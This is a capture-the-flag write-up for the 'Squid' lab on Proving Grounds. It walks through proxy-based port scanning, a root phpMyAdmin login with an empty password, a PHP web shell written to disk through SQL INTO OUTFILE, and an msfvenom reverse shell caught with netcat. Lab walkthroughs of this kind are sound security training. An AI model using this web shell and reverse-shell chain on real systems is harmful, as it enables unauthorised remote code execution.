Security Analyst | Security Researcher | CRTP

Proving grounds Practice: Squid

Proving grounds Practice - Squid CTF writeup.

Nmap

PORT     STATE SERVICE    VERSION
3128/tcp open  http-proxy Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved

Squid http proxy service running on PORT 3128. Use Squid Pivoting Open Port Scanner to perform PORT scanning.

img

Configure the proxy server IP and PORT in the browser to access the webserver running on PORT 8080.

img

System Information

img

PHPMyadmin

img

Login with username root and password as null.

Execute below sql query to create reverse shell.

SELECT "<?php system($_GET['cmd'])?>" INTO OUTFILE "C:/wamp/www/shell2.php"

As shown in the phpinfo() page the document root folder is C:/wamp/www. So the shell will be publicly accessible at http://192.168.237.189:8080/shell2.php.

Remote Code Execution

http://192.168.237.189:8080/shell2.php?cmd=whoami

img

Obtain Stable Shell using msfvenom

msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=1234 -o mshell.exe

Use curl to download the shell in to the attacking machine. Run a nc llisterner and execute the reverse shell by visiting http://192.168.237.189:8080/shell2.php?cmd=mshell.exe

img

Reverse shell obtained.

Thanks for reading!

For more updates and insights, follow me on Twitter: @thevillagehacker.